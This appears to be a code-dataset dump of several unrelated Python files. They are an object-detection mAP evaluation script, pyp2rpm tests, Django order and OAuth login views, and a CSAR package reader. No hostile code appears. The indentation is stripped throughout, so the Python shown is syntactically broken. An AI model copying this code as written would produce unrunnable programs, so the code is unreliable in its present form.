if class_name in ground_truth_counter_per_class:
ground_truth_counter_per_class[class_name] += 1
else:
ground_truth_counter_per_class[class_name] = 1
# 对每个类的图片进行计数
if class_name not in already_seen_classes:
if class_name in image_counter_per_class:
image_counter_per_class[class_name] += 1
else:
image_counter_per_class[class_name] = 1
already_seen_classes.append(class_name)
# 将 bounding box 保存为 json 文件
temp_file = temp_file_path + "/" + file_id + "_ground_truth.json"
ground_truth_file.append(temp_file)
with open(temp_file, 'w') as outfile:
json.dump(bounding_boxes, outfile)
ground_truth_classes = list(ground_truth_counter_per_class.keys())
ground_truth_classes = sorted(ground_truth_classes)
num_classes = len(ground_truth_classes)
# 检查是否设置了某个类别的 IoU
iou_list = []
if FLAGS.set_class_iou is not None:
num_args = len(FLAGS.set_class_iou)
if num_args % 2 != 0:
logging.error("输入参数个数不为2的倍数!")
sys.exit(0)
special_iou_classes = FLAGS.set_class_iou[::2]
iou_list = FLAGS.set_class_iou[1::2]
for tmp_class in special_iou_classes:
if tmp_class not in ground_truth_classes:
logging.error("未知的类:" + tmp_class)
sys.exit(0)
for tmp_iou in iou_list:
if not check_float_between_0_and_1(tmp_iou):
logging.error("错误的IoU值:" + tmp_iou)
sys.exit(0)
"""
获取并解析 detection result 文件
"""
# 得到 detection result 文件的列表
detection_results_file_list = glob.glob(detection_results_path + '/*.txt')
detection_results_file_list.sort()
for class_index, class_name in enumerate(ground_truth_classes):
bounding_boxes = []
for txt_file in detection_results_file_list:
file_id = txt_file.split(".txt", 1)[0]
file_id = os.path.basename(os.path.normpath(file_id))
# 检查是否有对应的 ground truth 文件
truth_path = os.path.join(ground_truth_path, (file_id + '.txt'))
if class_index == 0 and not os.path.exists(truth_path):
error_msg = "没有找到: {}\n".format(truth_path)
logging.error(error_msg)
sys.exit(0)
lines_list = file_lines_to_list(txt_file)
for line in lines_list:
try:
predict_class_name, confidence, left, top, right, bottom = line.split()
except ValueError:
error_msg = txt_file + "格式错误"
logging.error(error_msg)
sys.exit(0)
if predict_class_name == class_name:
bbox = left + " " + top + " " + right + " " + bottom
bounding_boxes.append({"confidence": confidence,
"bbox": bbox,
"file_id": file_id})
# 根据置信度降序排列 detection result
bounding_boxes.sort(key=lambda x: float(x['confidence']), reverse=True)
# 保存为 json 文件
with open(temp_file_path + '/' + class_name + "_detection_result.json", 'w') as outfile:
json.dump(bounding_boxes, outfile)
"""
计算每个类的 AP
"""
sum_ap = 0.0
ap_dictionary = {}
lamr_dictionary = {}
# 保存输出
with open(output_file_path + "/output.txt", 'w') as output_file:
output_file.write("# AP and precision/recall per class\n")
true_positive_count = {}
for class_index, class_name in enumerate(ground_truth_classes):
true_positive_count[class_name] = 0
# 加载对应类的 detection result
detection_results_file = temp_file_path + '/' + class_name + "_detection_result.json"
detection_results_data = json.load(open(detection_results_file))
num_data = len(detection_results_data)
tp = [0] * num_data
fp = [0] * num_data
for index, detection in enumerate(detection_results_data):
file_id = detection["file_id"]
if not FLAGS.no_animation:
# 找到对应图片
ground_truth_image = glob.glob1(image_path, file_id + ".*")
if len(ground_truth_image) == 0:
logging.error("没有找到图片:" + file_id)
sys.exit(0)
elif len(ground_truth_image) > 1:
logging.error("找到多张图片:" + file_id)
sys.exit(0)
else:
# 加载图片
img = cv2.imread(image_path + '/' + ground_truth_image[0])
# 加载带有预测框的图片
img_cumulative_path = output_file_path + "/images/" + ground_truth_image[0]
if os.path.isfile(img_cumulative_path):
img_cumulative = cv2.imread(img_cumulative_path)
else:
img_cumulative = img.copy()
# 给图片添加底边
bottom_border = 60
black = [0, 0, 0]
img = cv2.copyMakeBorder(img, 0, bottom_border, 0, 0, cv2.BORDER_CONSTANT, value=black)
# 加载对应的 ground truth 文件
ground_truth_file = temp_file_path + "/" + file_id + "_ground_truth.json"
ground_truth_data = json.load(open(ground_truth_file))
iou_max = -1
ground_truth_match = -1
# 加载预测框
bounding_box_dr = [float(x) for x in detection["bbox"].split()]
for obj in ground_truth_data:
# 查看类别名是否匹配
if obj["class_name"] == class_name:
# 加载标记框
bounding_box_gt = [float(x) for x in obj["bbox"].split()]
bounding_box_intersection = [max(bounding_box_dr[0], bounding_box_gt[0]),
max(bounding_box_dr[1], bounding_box_gt[1]),
min(bounding_box_dr[2], bounding_box_gt[2]),
min(bounding_box_dr[3], bounding_box_gt[3])]
intersection_width = bounding_box_intersection[2] - bounding_box_intersection[0] + 1
intersection_height = bounding_box_intersection[3] - bounding_box_intersection[1] + 1
if intersection_width > 0 and intersection_height > 0:
union = (bounding_box_dr[2] - bounding_box_dr[0] + 1) * \
(bounding_box_dr[3] - bounding_box_dr[1] + 1) + \
(bounding_box_gt[2] - bounding_box_gt[0] + 1) * \
(bounding_box_gt[3] - bounding_box_gt[1] + 1) - \
intersection_width * intersection_height
iou = intersection_width * intersection_height / union
if iou > iou_max:
iou_max = iou
ground_truth_match = obj
# 认为识别结果为 TP
if not FLAGS.no_animation:
status = "没有找到匹配项!"
min_overlap = MINOVERLAP
if FLAGS.set_class_iou is not None:
if class_name in FLAGS.set_class_iou:
iou_index = FLAGS.set_class_iou.index(class_name)
min_overlap = float(iou_list[iou_index])
if iou_max >= min_overlap:
if not ground_truth_match['difficult']:
if not bool(ground_truth_match["used"]):
# TP
tp[index] = 1
ground_truth_match["used"] = True
true_positive_count[class_name] += 1
# 更新 json 文件
with open(ground_truth_file, 'w') as f:
f.write(json.dumps(ground_truth_data))
if not FLAGS.no_animation:
status = "匹配成功!"
else:
# FP 多次识别
fp[index] = 1
if iou_max > 0:
status = "重复匹配!"
else:
# FP
fp[index] = 1
if iou_max > 0:
status = "overlap 不足"
# 显示动画
if not FLAGS.no_animation:
height, width = img.shape[:2]
# 颜色 BGR
white = (255, 255, 255)
light_blue = (255, 200, 100)
green = (0, 255, 0)
light_red = (30, 30, 255)
# 第一条线
margin = 10
v_pos = int(height - margin - (bottom_border / 2.0))
text = "Image: " + ground_truth_image[0] + " "
img, line_width = draw_text_in_image(img, text, (margin, v_pos), white, 0)
text = "Class [" + str(class_index) + "/" + str(num_classes) + "]: " + class_name + " "
img, line_width = draw_text_in_image(img, text, (margin + line_width, v_pos), light_blue,
line_width)
if iou_max != -1:
color = light_red
if status == "overlap 不足":
text = "IoU: {0:.2f}% ".format(iou_max * 100) + "< {0:.2f}% ".format(min_overlap * 100)
else:
text = "IoU: {0:.2f}% ".format(iou_max * 100) + ">= {0:.2f}% ".format(min_overlap * 100)
color = green
img, _ = draw_text_in_image(img, text, (margin + line_width, v_pos), color, line_width)
# 第二条线
v_pos += int(bottom_border / 2.0)
rank_pos = str(index + 1)
text = "Detection #rank: " + rank_pos + \
" confidence: {0:.2f}% ".format(float(detection["confidence"]) * 100)
img, line_width = draw_text_in_image(img, text, (margin, v_pos), white, 0)
color = light_red
if status == "匹配成功!":
color = green
text = "Result: " + status + " "
img, line_width = draw_text_in_image(img, text, (margin + line_width, v_pos), color, line_width)
font = cv2.FONT_HERSHEY_SIMPLEX
# 如果预测框和标记框有交集
if iou_max > 0:
bounding_box_gt = [int(round(float(x))) for x in ground_truth_match["bbox"].split()]
cv2.rectangle(img, (bounding_box_gt[0], bounding_box_gt[1]),
(bounding_box_gt[2], bounding_box_gt[3]), light_blue, 2)
cv2.rectangle(img_cumulative, (bounding_box_gt[0], bounding_box_gt[1]),
(bounding_box_gt[2], bounding_box_gt[3]), light_blue, 2)
cv2.putText(img_cumulative, class_name, (bounding_box_gt[0], bounding_box_gt[1] - 5),
font, 0.6, light_blue, 1, cv2.LINE_AA)
bounding_box_dr = [int(i) for i in bounding_box_dr]
cv2.rectangle(img, (bounding_box_dr[0], bounding_box_dr[1]),
(bounding_box_dr[2], bounding_box_dr[3]), color, 2)
cv2.rectangle(img_cumulative, (bounding_box_dr[0], bounding_box_dr[1]),
(bounding_box_dr[2], bounding_box_dr[3]), color, 2)
cv2.putText(img_cumulative, class_name, (bounding_box_dr[0], bounding_box_dr[1] - 5),
font, 0.6, color, 1, cv2.LINE_AA)
# 展示图片
cv2.imshow("Animation", img)
cv2.waitKey(20)
# 保存图片
output_image_path = (output_file_path + "/images/detections_one_by_one/" +
class_name + "_detection" + str(index) + ".jpg")
cv2.imwrite(output_image_path, img)
cv2.imwrite(img_cumulative_path, img_cumulative)
# 计算 precision / recall
cumsum = 0
for index, val in enumerate(fp):
fp[index] += cumsum
cumsum += val
cumsum = 0
for index, val in enumerate(tp):
tp[index] += cumsum
cumsum += val
# TODO: 使用 numpy 代替 list
recall = tp[:]
for index, val in enumerate(tp):
# noinspection PyTypeChecker
recall[index] = float(tp[index]) / ground_truth_counter_per_class[class_name]
precision = tp[:]
for index, val in enumerate(tp):
# noinspection PyTypeChecker
precision[index] = float(tp[index]) / (fp[index] + tp[index])
ap, m_precision, m_recall = voc_ap(precision[:], recall[:])
sum_ap += ap
text = "{0:.2f}%".format(ap * 100) + " = " + class_name + " AP "
# 写入输出文件
rounded_precision = ['%.2f' % elem for elem in precision]
rounded_recall = ['%.2f' % elem for elem in recall]
output_file.write(text + "\n Precision: " + str(rounded_precision) + "\n Recall :" + str(rounded_recall) + "\n\n")
if not FLAGS.quiet:
print(text)
ap_dictionary[class_name] = ap
_num_images = image_counter_per_class[class_name]
lamr, mr, fppi = calculate_log_average_miss_rate(np.array(precision), np.array(recall))
lamr_dictionary[class_name] = lamr
# 画图表
if not FLAGS.no_plot:
plt.plot(recall, precision, '-o')
# 在 list 倒数第二位置添加一点 (m_recall[-2], 0.0),因为最后的一段不影响 AP 的值
area_under_curve_x = m_recall[:-1] + [m_recall[-2] + m_recall[-1]]
area_under_curve_y = m_precision[:-1] + [0.0] + [m_precision[-1]]
plt.fill_between(area_under_curve_x, 0, area_under_curve_y, alpha=0.2, edgecolor='r')
# 设置窗口标题
fig = plt.gcf()
fig.canvas.set_window_title('AP ' + class_name)
# 设置图表标题
plt.title('class:' + text)
# 设置坐标轴名称
plt.xlabel('Recall')
plt.ylabel('Precision')
# 设置坐标轴
axes = plt.gca()
axes.set_xlim([0.0, 1.0])
axes.set_ylim([0.0, 1.05])
# 保存图表
fig.savefig(output_file_path + "/classes/" + class_name + ".png")
plt.cla()
if not FLAGS.no_animation:
cv2.destroyAllWindows()
output_file.write("\n# mAP of all classes\n")
m_ap = sum_ap / num_classes
text = "mAP = {0:.2f}%".format(m_ap * 100)
output_file.write(text + "\n")
print(text)
# FP
if not FLAGS.no_animation:
pink = (203, 192, 255)
for tmp_file in ground_truth_file:
ground_truth_data = json.load(open(tmp_file))
start = temp_file_path + '/'
img_id = tmp_file[tmp_file.find(start) + len(start): tmp_file.rfind('_ground_truth.json')]
img_cumulative_path = output_file_path + "/images/" + img_id + ".jpg"
img = cv2.imread(img_cumulative_path)
if img is None:
img_path = image_path + '/' + img_id + ".jpg"
img = cv2.imread(img_path)
# 画 FP
for obj in ground_truth_data:
if not obj['used']:
bounding_box_gt = [int(round(float(x))) for x in obj["bbox"].split()]
cv2.rectangle(img, (bounding_box_gt[0], bounding_box_gt[1]),
(bounding_box_gt[2], bounding_box_gt[3]), pink, 2)
cv2.imwrite(img_cumulative_path, img)
# 计算 detection result 总数
detection_result_counter_per_class = {}
for txt_file in detection_results_file_list:
lines_list = file_lines_to_list(txt_file)
for line in lines_list:
class_name = line.split()[0]
if class_name in FLAGS.ignore:
continue
if class_name in detection_result_counter_per_class:
detection_result_counter_per_class[class_name] += 1
else:
detection_result_counter_per_class[class_name] = 1
detection_result_classes = list(detection_result_counter_per_class.keys())
# 做 ground truth 中每个类的个数的图表
if not FLAGS.no_plot:
window_title = "ground-truth-info"
plot_title = "ground-truth\n"
plot_title += "(" + str(len(ground_truth_file_list)) + " files and " + str(num_classes) + " classes)"
x_label = "Number of objects per class"
output_path = output_file_path + "/ground-truth-info.png"
to_show = False
plot_color = 'forestgreen'
draw_plot_func(ground_truth_counter_per_class, num_classes, window_title, plot_title, x_label, output_path,
to_show, plot_color, '')
# 保存 ground truth 中每个类的个数到 output.txt
with open(output_file_path + "/output.txt", 'a') as output_file:
output_file.write("\n# Number of ground-truth objects per class\n")
for class_name in sorted(ground_truth_counter_per_class):
output_file.write(class_name + ": " + str(ground_truth_counter_per_class[class_name]) + "\n")
# 完成对 TP 计数
for class_name in detection_result_classes:
# 如果在 detection result 但是没有在 ground truth 里,说明这个类里没有 TP
if class_name not in ground_truth_classes:
true_positive_count[class_name] = 0
# 做 detection result 中每个类的个数的图表
if not FLAGS.no_plot:
window_title = "detection-results-info"
plot_title = "detection-results\n"
plot_title += "(" + str(len(detection_results_file_list)) + " files and "
count_non_zero_values_in_dictionary = sum(int(x) > 0 for x in list(detection_result_counter_per_class.values()))
plot_title += str(count_non_zero_values_in_dictionary) + " detected classes)"
x_label = "Number of objects per class"
output_path = output_file_path + "/detection-results-info.png"
to_show = False
plot_color = 'forestgreen'
true_positive_bar = true_positive_count
draw_plot_func(detection_result_counter_per_class, len(detection_result_counter_per_class), window_title,
plot_title, x_label, output_path, to_show, plot_color, true_positive_bar)
# 保存 detection result 中每个类的个数到 output.txt
with open(output_file_path + "/output.txt", 'a') as output_file:
output_file.write("\n# Number of detected objects per class\n")
for class_name in sorted(detection_result_classes):
output_file.write(class_name + ": " + str(detection_result_counter_per_class[class_name]) +
" (tp:" + str(true_positive_count[class_name]) + ", fp:" +
str(detection_result_counter_per_class[class_name] - true_positive_count[class_name]) +
")\n")
# log-average miss rate
if not FLAGS.no_plot:
window_title = "lamr"
plot_title = "log-average miss rate"
x_label = "log-average miss rate"
output_path = output_file_path + "/lamr.png"
to_show = False
plot_color = 'royalblue'
draw_plot_func(lamr_dictionary, num_classes, window_title, plot_title, x_label, output_path, to_show,
plot_color, "")
# mAP
if not FLAGS.no_plot:
window_title = "mAP"
plot_title = "mAP = {0:.2f}%".format(m_ap * 100)
x_label = "Average Precision"
output_path = output_file_path + "/mAP.png"
to_show = True
plot_color = 'royalblue'
draw_plot_func(ap_dictionary, num_classes, window_title, plot_title, x_label, output_path, to_show,
plot_color, "")
# 删除 temp 文件夹
shutil.rmtree(temp_file_path)
if __name__ == '__main__':
try:
app.run(main)
except SystemExit:
pass
``` |
{
"source": "00willo/pyp2rpm",
"score": 2
} |
#### File: pyp2rpm/tests/test_package_getters.py
```python
import os
import tempfile
import shutil
import pytest
from flexmock import flexmock
try:
import xmlrpclib
except ImportError:
import xmlrpc.client as xmlrpclib
from pyp2rpm.package_getters import LocalFileGetter, PypiDownloader, get_url
from pyp2rpm.exceptions import MissingUrlException, NoSuchPackageException
from pyp2rpm import settings
tests_dir = os.path.split(os.path.abspath(__file__))[0]
class TestPackageGetters(object):
client = xmlrpclib.ServerProxy(settings.PYPI_URL)
@pytest.mark.parametrize(('name', 'version', 'wheel', 'hf', 'expected_url', 'expected_md5'), [
('setuptools', '18.3.1', False, False,
'https://files.pythonhosted.org/packages/source/s/setuptools/setuptools-18.3.1.tar.gz',
'748187b93152fa60287dfb896837fd7c'),
('setuptools', '18.3.1', True, False,
'https://files.pythonhosted.org/packages/source/s/setuptools/setuptools-18.3.1-py2.py3-none-any.whl',
'a21a4d02d0bab2eac499cca72faeb076'),
('setuptools', '18.3.1', False, True,
'https://files.pythonhosted.org/packages/86/8a/c4666b05c74e840eb9b09d28f4e7ae76fc9075e8c653d0eb4d265a5b49d9/setuptools-18.3.1.tar.gz',
'748187b93152fa60287dfb896837fd7c'),
('pypandoc', '1.1.3', False, False,
'https://files.pythonhosted.org/packages/source/p/pypandoc/pypandoc-1.1.3.zip',
'771f376bf9c936a90159cd94235998c2'),
])
@pytest.mark.webtest
def test_get_url(self, name, version, wheel, hf,
expected_url, expected_md5):
assert (expected_url, expected_md5) == get_url(
self.client, name, version, wheel, hf)
@pytest.mark.parametrize(('name', 'version', 'wheel', 'hf',
'exception', 'error_msg'), [
('nonexistent_pkg', '0.0.0', False, False, MissingUrlException,
'Url of source archive not found.'),
('Pymacs', '0.25', False, False, MissingUrlException,
'Pymacs package has no sources on PyPI, Please ask the maintainer to upload sources.'),
])
@pytest.mark.webtest
def test_get_url_raises(self, name, version, wheel, hf,
exception, error_msg):
with pytest.raises(exception) as exc_info:
get_url(self.client, name, version, wheel, hf)
assert error_msg == str(exc_info.value)
class TestPypiFileGetter(object):
client = flexmock(
package_releases=lambda n, hidden: n == 'spam' and ['3.rc1', '2', '1'] or [],
release_urls=lambda n, v: n == 'spam' and v in [
'3.rc1', '2', '1'] and [{'url': 'spam'}] or []
)
@pytest.mark.parametrize(('name', 'version'), [
('eggs', '2'),
('spam', '3'),
])
def test_init_bad_data(self, name, version):
with pytest.raises(NoSuchPackageException):
PypiDownloader(self.client, name, version)
@pytest.mark.parametrize(('name', 'version', 'expected_ver'), [
('spam', '1', '1'),
('spam', None, '2'),
])
def test_init_good_data(self, name, version, expected_ver):
d = PypiDownloader(self.client, name, version)
assert d.version == expected_ver
@pytest.mark.parametrize(('name', 'version', 'expected_ver'), [
('spam', '1', '1'),
('spam', None, '3.rc1'),
])
def test_init_good_data_pre(self, name, version, expected_ver):
d = PypiDownloader(self.client, name, version, prerelease=True)
assert d.version == expected_ver
class TestLocalFileGetter(object):
td_dir = '{0}/test_data/'.format(tests_dir)
def setup_method(self, method):
self.l = [LocalFileGetter('{0}plumbum-0.9.0.tar.gz'.format(
self.td_dir)),
LocalFileGetter('{0}Sphinx-1.1.3-py2.6.egg'.format(
self.td_dir)),
LocalFileGetter('{0}unextractable-1.tar'.format(
self.td_dir)),
LocalFileGetter(
'{0}setuptools-19.6-py2.py3-none-any.whl'.format(
self.td_dir)),
LocalFileGetter(
'{0}py2exe-0.9.2.2-py33.py34-none-any.whl'.format(
self.td_dir)),
LocalFileGetter('python-foo-1.tar'),
LocalFileGetter('python-many-dashes-foo-1.tar'),
]
def teardown_method(self, method):
for file_getter in self.l:
if hasattr(file_getter, 'temp_dir'):
shutil.rmtree(file_getter.temp_dir)
@pytest.mark.parametrize(('i', 'expected'), [
(0, 'plumbum-0.9.0'),
(1, 'Sphinx-1.1.3-py2.6'),
(2, 'unextractable-1'),
(3, 'setuptools-19.6-py2.py3-none-any'),
(4, 'py2exe-0.9.2.2-py33.py34-none-any'),
])
def test_stripped_name_version(self, i, expected):
assert self.l[i]._stripped_name_version == expected
@pytest.mark.parametrize(('i', 'expected'), [
(0, ('plumbum', '0.9.0')),
(1, ('Sphinx', '1.1.3')),
(3, ('setuptools', '19.6')),
(4, ('py2exe', '0.9.2.2')),
(5, ('python-foo', '1')),
(6, ('python-many-dashes-foo', '1')),
])
def test_get_name_version(self, i, expected):
assert self.l[i].get_name_version() == expected
def test_get_non_existent_file(self):
with pytest.raises(EnvironmentError):
LocalFileGetter('/this/path/doesnot/exist',
tempfile.gettempdir()).get()
def test_get_existent_file(self):
tmpdir = tempfile.gettempdir()
in_tmp_dir = os.path.join(tmpdir, 'plumbum-0.9.0.tar.gz')
self.l[0].save_dir = tmpdir
if os.path.exists(in_tmp_dir):
os.unlink(in_tmp_dir)
assert self.l[0].get() == in_tmp_dir
assert os.path.exists(self.l[0].get())
os.unlink(in_tmp_dir)
def test_get_to_same_location(self):
tmpdir = tempfile.gettempdir()
self.l[1].save_dir = self.td_dir
assert os.path.samefile(self.l[1].get(), os.path.join(
self.td_dir, 'Sphinx-1.1.3-py2.6.egg'))
assert not os.path.exists(os.path.join(tmpdir,
'Sphinx-1.1.3-py2.6.egg'))
``` |
{
"source": "00wsmart00/ihome_project",
"score": 2
} |
#### File: apps/order/views.py
```python
import datetime
import json
from django import http
from django.shortcuts import render
# Create your views here.
from django.views import View
from houses.models import House
from ihome.utils.response_code import RET
from order.models import Order
class OrderView(View):
"""订单"""
def post(self, request):
"""添加订单"""
json_dict = json.loads(request.body.decode())
house_id = json_dict.get('house_id')
start_date = json_dict.get('start_date')
end_date = json_dict.get('end_date')
date1 = datetime.datetime.strptime(start_date, "%Y-%m-%d")
date2 = datetime.datetime.strptime(end_date, "%Y-%m-%d")
days = (date2 - date1).days
house_price = House.objects.get(id=house_id).price
amount = days * house_price
# 保存订单数据
try:
order_house = Order.objects.create(
house_id=house_id,
begin_date=start_date,
end_date=end_date,
user_id=request.user.id,
days=days,
house_price=house_price,
amount=amount
)
except Exception as e:
print(e)
return http.JsonResponse({
"errno": RET.DBERR,
"errmsg": "保存订单失败"
})
order_id = order_house.id
return http.JsonResponse({
"errno": RET.OK,
"errmsg": "保存订单成功",
"data": {"order_id": order_id}
})
def get(self, request):
"""获取订单"""
json_dict = request.GET
role = json_dict.get('role')
user = request.user
data = dict()
orders_list = []
if role == 'custom':
try:
orders = Order.objects.filter(user_id=user.id)
except Order.DoesNotExist:
return http.JsonResponse({
"errno": RET.DBERR,
"errmsg": "数据不存在"
})
else:
try:
orders = Order.objects.filter(house_id__in=user.house_set.all())
except Order.DoesNotExist:
return http.JsonResponse({
"errno": RET.DBERR,
"errmsg": "数据不存在"
})
for order in orders:
order_dict = dict()
try:
order_dict['amount'] = order.amount
order_dict['comment'] = order.comment
order_dict['ctime'] = order.create_time
order_dict['days'] = order.days
order_dict['end_date'] = order.end_date
order_dict['img_url'] = order.house.index_image_url
order_dict['order_id'] = order.id
order_dict['start_date'] = order.begin_date
order_dict['status'] = order.status
order_dict['title'] = order.house.title
orders_list.append(order_dict)
data["orders"] = orders_list
except Exception as e:
print(e)
return http.JsonResponse({
"errmsg": "数据查询错误",
"errno": RET.DBERR
})
return http.JsonResponse({
"data": data,
"errmsg": "OK",
"errno": RET.OK
})
# 订单处理
def put(self, request):
json_dict = json.loads(request.body.decode())
action = json_dict.get("action")
order_id = json_dict.get('order_id')
reason = json_dict.get('reason')
if action == 'reject':
try:
order = Order.objects.get(id=order_id)
order.status = Order.ORDER_STATUS_CHOICES[6][0]
order.comment = reason
order.save()
except Exception as e:
print(e)
return http.JsonResponse({
"errmsg": "更新数据失败",
"errno": RET.DBERR
})
else:
try:
order = Order.objects.get(id=order_id)
order.status = Order.ORDER_STATUS_CHOICES[3][0]
order.save()
except Exception as e:
print(e)
return http.JsonResponse({
"errmsg": "更新数据失败",
"errno": RET.DBERR
})
return http.JsonResponse({
"errno": RET.OK,
"errmsg": "OK"
})
class CommentView(View):
"""客户评论"""
def put(self, request):
json_dict = json.loads(request.body.decode())
comment = json_dict.get('comment')
order_id = json_dict.get('order_id')
try:
order = Order.objects.get(id=order_id)
order.status = Order.ORDER_STATUS_CHOICES[4][0]
order.comment = comment
order.save()
except Exception as e:
print(e)
return http.JsonResponse({
"errmsg": "更新数据失败",
"errno": RET.DBERR
})
return http.JsonResponse({
"errno": RET.OK,
"errmsg": "OK"
})
``` |
{
"source": "00wsmart00/meiduo_project_all",
"score": 2
} |
#### File: apps/contents/views.py
```python
from django.shortcuts import render
# Create your views here.
from django.views import View
from contents.models import ContentCategory
from goods.utils import get_categories
class IndexView(View):
"""首页广告"""
def get(self, request):
"""提供首页广告界面"""
# 查询商品频道和分类
categories = get_categories()
# 定义一个空的字典
dict = {}
# 查询出所有的广告类别
content_categories = ContentCategory.objects.all()
# 遍历所有的广告类别, 然后放入到定义的空字典中:
for cat in content_categories:
# 获取类别所对应的展示数据, 并对数据进行排序:
# key:value ==> 商品类别.key:具体的所有商品(排过序)
dict[cat.key] = cat.content_set.filter(status=True).order_by('sequence')
# 拼接参数:
context = {
# 这是首页需要的一二级分类信息:
'categories': categories,
# 这是首页需要的能展示的三级信息:
'contents': dict,
}
# 返回界面, 同时传入参数:
return render(request, 'index.html', context=context)
```
#### File: apps/oauth/views.py
```python
import re
from QQLoginTool.QQtool import OAuthQQ
from django import http
from django.conf import settings
from django.contrib.auth import login
from django.db import DatabaseError
from django.shortcuts import render, redirect
from django_redis import get_redis_connection
# Create your views here.
from django.urls import reverse
from django.views import View
from meiduo_mall.utils.response_code import RETCODE
import logging
from oauth.models import OAuthQQUser
from oauth.utils import generate_access_token, check_access_token
from users.models import User
logger = logging.getLogger('django')
class QQUserView(View):
"""用户扫码登录的回调处理"""
def get(self, request):
"""Oauth2.0认证"""
# 接收Authorization Code
code = request.GET.get('code')
if not code:
return http.HttpResponseForbidden('缺少必传参数')
# 创建工具对象
oauth = OAuthQQ(client_id=settings.QQ_CLIENT_ID,
client_secret=settings.QQ_CLIENT_SECRET,
redirect_uri=settings.QQ_REDIRECT_URI)
try:
# 携带code向qq服务器请求access_token
access_token = oauth.get_access_token(code)
# 携带access_token去请求openid
openid = oauth.get_open_id(access_token)
except Exception as e:
logger.error(e)
return http.HttpResponseForbidden('OAuth2.0认证失败')
# 使用openID去判断用户是否存在
try:
oauth_user = OAuthQQUser.objects.get(openid=openid)
except OAuthQQUser.DoesNotExist:
# 用户不存在
access_token = generate_access_token(openid)
# 拿到access_token,渲染到模板中返回
context = {'access_token': access_token}
return render(request, 'oauth_callback.html', context)
pass
else:
# 用户存在
# 根据外键,获取对应的QQ用户
user = oauth_user.user
# 实现状态保持
login(request, user)
# 创建重定向到首页
response = redirect(reverse('contents:index'))
# 写入cookie,15天
response.set_cookie('username', user.username, max_age=3600*24*15)
# 返回响应
return response
def post(self,request):
# 接受参数
mobile = request.POST.get('mobile')
password = request.POST.get('password')
sms_code_cli = request.POST.get('sms_code')
access_token = request.POST.get('access_token')
# 检验参数
if not all([mobile, password, sms_code_cli]):
return http.HttpResponseForbidden("缺少必传参数")
# 判断手机号是否合法
if not re.match(r'^1[3-9]\d{9}$', mobile):
return http.HttpResponseForbidden('手机号格式不匹配')
# 判断密码是否合格
if not re.match(r'^[0-9A-Za-z]{8,20}$', password):
return http.HttpResponseForbidden('请输入8-20位的密码')
# 判断短信验证码是否合格
# 链接redis
redis_connection = get_redis_connection('verify_code')
# 从redis中获取sms_code的值
sms_code_server = redis_connection.get('sms_code_%s' % mobile)
# 取不取的出来值
# 取不出
if sms_code_server is None:
return render(request, 'oauth_callback.html', {'sms_code_errmsg':'无效的短信验证码'})
# 取得出
# 判断短信验证码是否一致
if sms_code_server.decode() != sms_code_cli:
return render(request, 'oauth_callback.html', {'sms_code_errmsg': '输入短信验证码有误'})
# 判断access_token 是否正确
openid = check_access_token(access_token)
if openid is None:
return render(request, 'oauth_callback.html', {'openid_errmsg': '无效的openid'})
# 保存注册数据
try:
user= User.objects.get(mobile=mobile)
except User.DoesNotExist:
# 用户不存在,新建用户
user = User.objects.create_user(username=mobile, password=password, mobile=mobile)
else:
# 如果用户存在,检查用户密码
if not user.check_password(password):
return render(request, 'oauth_callback.html', {'account_errmsg': '用户名或密码错误'})
# 将用户绑定 openid
try:
OAuthQQUser.objects.create(openid=openid, user=user)
except DatabaseError:
return render(request, 'oauth_callback.html', {'qq_login_errmsg': 'QQ登录失败'})
# 实现状态保持
login(request, user)
# 响应绑定结果
next = request.GET.get('state')
response = redirect(next)
# 登录时用户名写入到 cookie,有效期15天
response.set_cookie('username', user.username, max_age=3600 * 24 * 15)
# 响应
return response
class QQURLView(View):
"""提供QQ登录页面网址
https://graph.qq.com/oauth2.0/authorize?
response_type=code&
client_id=xxx&
redirect_uri=xxx&
state=xxx
"""
def get(self, request):
# next 表示从哪个页面进入到的登录页面
next = request.GET.get('next')
# 获取QQ的登录页面网址
# 创建OAuthQQ 类的对象
oauth = OAuthQQ(client_id=settings.QQ_CLIENT_ID,
client_secret=settings.QQ_CLIENT_SECRET,
redirect_uri=settings.QQ_REDIRECT_URI,
state=next)
# 调用对象的获取QQ地址的方法
login_url = oauth.get_qq_url()
return http.JsonResponse({
'code': RETCODE.OK,
'errmsg': 'OK',
'login_url': login_url
})
``` |
{
"source": "01000101/aria-csar-extension",
"score": 2
} |
#### File: aria-csar-extension/nfvo_packager/reader.py
```python
import logging
import os
from shutil import rmtree
from glob import glob
from tempfile import mkstemp, mkdtemp
import mimetypes
import hashlib
from base64 import b64decode
from pprint import pformat
import zipfile
import yaml
import requests
from nfvo_packager import constants
logging.basicConfig(level=logging.DEBUG)
class CSARReader(object):
'''
TOSCA Cloud Service Archive (CSAR) reader. This class
is a helper for reading, validating, and extracting information
from CSAR v1.1 ZIP files (locally or remotely).
'''
def __init__(self, source, is_external=False, logger=None):
self.log = logger or logging.getLogger('csar.reader')
self.log.debug('CSARReader(%s, %s)', source, is_external)
self.csar = {
'source': source,
'external': is_external,
'local': None,
'destination': None,
'metadata': None,
'artifacts': None
}
self._retrieve()
self._extract()
self._validate()
def __del__(self):
'''
Deletes temporary files and folders
'''
if self.csar.get('local') and \
self.csar.get('source') and \
self.csar['local'] != os.path.normpath(self.csar['source']) and \
os.path.isfile(self.csar['local']):
self.log.debug('Removing temporary file: %s', self.csar['local'])
os.remove(self.csar['local'])
if self.csar.get('destination') and \
os.path.isdir(self.csar['destination']):
self.log.debug('Removing temporary directory: %s',
self.csar['destination'])
rmtree(self.csar['destination'])
@property
def has_metadata_file(self):
'''Returns True if a metadata file exists'''
return os.path.isfile(os.path.join(self.path, constants.META_FILE))
@property
def metadata(self):
'''Returns CSAR metadata'''
return self.csar.get('metadata', dict())
@property
def artifacts(self):
'''Returns CSAR artifacts'''
return self.metadata.get('artifacts', dict())
@property
def path(self):
'''Returns the root (extracted) CSAR directory path'''
return self.csar.get('destination')
@property
def author(self):
'''Returns the CSAR package author'''
return self.metadata.get(constants.META_CREATED_BY_KEY) or \
self.metadata.get(constants.META_TMPL_AUTHOR_KEY)
@property
def version(self):
'''Returns the CSAR version'''
return self.metadata.get(constants.META_CSAR_VERSION_KEY) or \
self.metadata.get(constants.META_TMPL_VERSION_KEY)
@property
def metadata_file_version(self):
'''Returns the CSAR metadata file version'''
return self.metadata.get(constants.META_FILE_VERSION_KEY)
@property
def template_name(self):
'''Returns the CSAR template name'''
return self.metadata.get(constants.META_TMPL_NAME_KEY)
@property
def entry_definitions(self):
'''Returns the Entry-Definitions (relative) path'''
return self.metadata.get(constants.META_ENTRY_DEFINITIONS_KEY)
@property
